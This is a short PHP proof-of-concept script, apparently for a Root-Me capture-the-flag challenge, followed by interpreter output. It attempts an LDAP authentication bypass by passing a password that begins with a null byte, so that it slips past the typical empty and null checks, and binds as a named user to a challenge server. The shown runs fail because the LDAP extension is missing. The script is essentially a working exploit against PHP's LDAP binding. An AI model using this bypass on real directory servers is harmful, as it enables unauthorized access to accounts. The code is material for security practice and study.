<?php
$username="alex.everett@okstate.edu"; //LDAP rdn or dn
$password="\x00\x41"; //associated password (poison null byte)
// $username=$_POST['username']; //uncomment to test POST request
// $password=$_POST['password']; //uncomment to test POST request
if (!$username or !$password) {
exit(); //typical check for no username or password
} //end check 1
if (empty($username) or empty($password)) {
exit(); //typical check for no username or password
}//end check 2
if (is_null($username) or is_null($password)) {
exit(); //typical check for no username or password
}//end check 3
//notice that typical checks will not prevent the attack
echo(strlen($password) . "\r\n"); //outputs the length of the string
// connect to ldap server
$ldapconn = ldap_connect("challenge01.root-me.org", "54013") //LDAP server
or die("Could not connect to LDAP server");
if ($ldapconn) {
// binding to ldap server
$ldapbind = ldap_bind($ldapconn, $username, $password);
//verify binding. Note that the complete data is not passed.
if ($ldapbind) {
echo "LDAP bind successful...";
} else {
echo "LDAP bind failed...";
}
}
?>
2
Fatal error: Uncaught Error: Call to undefined function ldap_connect() in /in/gg279:20
Stack trace:
#0 {main}
thrown in /in/gg279 on line 20
Process exited with code 255.
Output for 5.6.0 - 5.6.24
2
Fatal error: Call to undefined function ldap_connect() in /in/gg279 on line 20
Process exited with code 255.